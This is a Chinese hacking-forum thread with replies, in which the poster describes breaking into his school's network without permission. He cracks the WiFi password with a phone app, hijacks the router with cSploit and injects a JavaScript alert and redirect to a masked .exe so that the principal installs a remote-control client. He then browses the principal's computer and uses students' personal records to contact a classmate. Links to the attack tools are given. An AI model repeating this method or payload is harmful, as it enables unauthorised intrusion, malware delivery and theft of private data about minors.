查看: 1789|回复: 29

我是如何通过WIFI渗透进校长电脑(一)

[复制链接]

主题

好友

80

积分

新兵上阵

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2016-7-13 13:43 |显示全部楼层
TG-NET
Anywlan微信公众号
本帖最后由 瞅啥瞅 于 2016-7-14 13:47 编辑

作者:jing0102
来源:i春秋社区
bbs.ichunqiu.com


0x01 介绍

本人由于刚接手本板块呢,就发挥了我多年不用的通信安全方面的技术。在学校考试听见同学说学校wifi密码知道了,于是我问他们要密码死活不给我,可能是怕我"小动作",于是。。。。

0x02 内容发展
因为我的好童鞋不告诉我wifi的密码,所以我就拿起神器开始漫长的破解:
因为在学校没有笔记本,所以只好用可怜的手机来进行破解。(因为手机内存不够所以没有安装kalilinux)工具:1.幻影WIFI(手机软件)下载地址:
  1. http://pkg.fir.im/d0ab1120d05f11e4a5e73733129d76ac4d9da714.apk?attname=%E5%B9%BB%E5%BD%B1Pin1.75.apk_1.75.apk&e=1465023740&token=LOvmia8oXF4xnLh0IdH05XMYpH6ENHNpARlmPc-T:VZvO1NeJPKHv40OnILyOuItmJl8=
复制代码



2.字典
这边字典我是自己按照学校的一些信息来设置的
3.时间(因为字典的大小取决于破解的效率,所以牛逼的字典和牛逼的手机配置也是需要很长时间的)
废话不多说,直接来操作,打开幻影WIFI
把自己的字典设置好后,点击破解选中学校的wifi,进行破解:

大概是跑了2个多小时,因为我考完语文后发现破解成功的记录已经有了:

搞了半天密码原来是校长的手机号+名字开头。。
成功的连接了密码后,当然是先192.168.1.1进入路由器管理,可是这可恶的网络管理员让我破解了30分钟都没破出密码,我就放弃了从这方面入手的想法。
但是呢我是谁?答:"黑客"。
于是乎祭出了杀器"cSploit",这是一款适用于安卓通信网络安全分析和渗透的工具。
下载地址:
  1. https://github-cloud.s3.amazonaws.com/releases/24782902/adb00552-f52c-11e5-9e5f-3b3aef90ccc8.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160604T060355Z&X-Amz-Expires=300&X-Amz-Signature=9977770c7e766e82ab282af3f0436a125dfdbaffd60718d4e87c4f0069062627&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DcSploit-release.apk&response-content-type=application%2Fvnd.android.package-archive
复制代码



打开cSploit,看到了很多台设备,这么多台该如何寻找呢?其实不需要咱们只需要劫持一个路由器所有人就会被咱劫持
我是在想控制校长的电脑,去看看有啥好东西。
于是一个邪恶的计划出现了:
利用注入JS文件来跳转让校长下载我之前玩远控时的被控端,等回家后就可以控制校长的电脑了。

于是我构建了这样一串:
  • alert('请安装客户端后再使用浏览器');

[color=rgb(85, 85, 85) !important]复制代码

window.location.href="****/**.exe";
这边是跳转到我以前被控端下载地址,当诱惑校长自动下载后,当然是有50%的几率是不成功的,这就要我回家看看成果了。
------------------------------many time---------------------------------------
回家后欣喜的发现了我们学校的IP
真的是天助我也?那么这边为什么断定就是校长的电脑?因为如下:于是打开了屏幕管理,监视了10多分钟没人动电脑,我就开始乱翻了。

翻到了我们学校这届学生的所有信息,通过这个找到了女神的QQ

不多说加上QQ就是一阵撩妹= =
--------------end----------------
0x03 结尾
通过这件事可以告诉我们通信安全也是需要重视的,建议学校方面加强WIFI的密码安全性。



        本文来自i春秋社区
更多优秀文章请关注i春秋社区
       bbs.ichunqiu.com


点评

那是因为别人电脑没有开杀软和防火墙,如果开了其中一个,肉鸡的被控端还有存活的机会?除非你很牛逼加上一个牛逼的壳  发表于 2016-7-15 21:19

主题

好友

1171

积分

上尉

签到天数: 32 天

[LV.5]常住居民I

发表于 2016-7-18 16:48 |显示全部楼层

我也觉得不现实,我们跑包都跑的累死累活的,手机两个小时就跑出来了,能跑13位密码只要2个小时,这字典得逆天啊,而且要能知道校长电话也是蛮厉害的。感觉这完全都靠运气了,几乎和自己猜都差不多了。
第二个,要用那个spolit软件的话,必须在一个无线局域网里,无线网范围也不大吧,而且校长的电脑一般在办公室,而办公室一般都在原理教学楼的行政楼里,难道要跑到校长办公室附近一直等着校长上网啊。
回复

使用道具 举报

主题

好友

3108

积分

少校

签到天数: 271 天

[LV.8]以坛为家I

发表于 2016-7-13 14:06 |显示全部楼层
回复

使用道具 举报

主题

好友

60

积分

新兵上阵

签到天数: 4 天

[LV.2]偶尔看看I

发表于 2016-7-13 15:43 |显示全部楼层
太牛逼,那个被控端是什么
回复

使用道具 举报

主题

好友

6854

积分

中校

签到天数: 709 天

[LV.9]以坛为家II

发表于 2016-7-13 16:01 |显示全部楼层
这个风险太大 XP系统安全机制不好确实 说到底这个还是看人品 并不能百分百做到绝对渗透
回复

使用道具 举报

主题

好友

80

积分

新兵上阵

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2016-7-13 18:20 |显示全部楼层
残叶. 发表于 2016-7-13 16:01
这个风险太大 XP系统安全机制不好确实 说到底这个还是看人品 并不能百分百做到绝对渗透

应该可以的吧
回复

使用道具 举报

主题

好友

656

积分

中尉

签到天数: 33 天

[LV.5]常住居民I

发表于 2016-7-13 18:29 |显示全部楼层
楼主你乱翻的时候校长的电脑屏幕是同步显示你的操作的吗?
回复

使用道具 举报

主题

好友

2万

积分

大校

签到天数: 1007 天

[LV.10]以坛为家III

发表于 2016-7-13 18:45 |显示全部楼层
早几年前就会用了 麻烦不要显摆了  还黑客呢,,呵呵吧
回复

使用道具 举报

主题

好友

80

积分

新兵上阵

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2016-7-13 18:45 |显示全部楼层
paston 发表于 2016-7-13 18:29
楼主你乱翻的时候校长的电脑屏幕是同步显示你的操作的吗?

当然啦
回复

使用道具 举报

主题

好友

80

积分

新兵上阵

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2016-7-13 18:46 |显示全部楼层
蛤蟆爱天鹅 发表于 2016-7-13 18:45
早几年前就会用了 麻烦不要显摆了  还黑客呢,,呵呵吧

没说黑客啊
回复

使用道具 举报

主题

好友

1895

积分

上尉

签到天数: 11 天

[LV.3]偶尔看看II

发表于 2016-7-13 19:16 |显示全部楼层
。。。。。多少年前玩的东西了   
回复

使用道具 举报

主题

好友

5890

积分

中校

签到天数: 88 天

[LV.6]常住居民II

发表于 2016-7-13 21:51 |显示全部楼层
还有点社工的影子,话说你的  被控端  是免杀的?
回复

使用道具 举报

主题

好友

827

积分

中尉

签到天数: 57 天

[LV.5]常住居民I

发表于 2016-7-13 22:16 |显示全部楼层
早说嘛!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-12-8 00:24

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表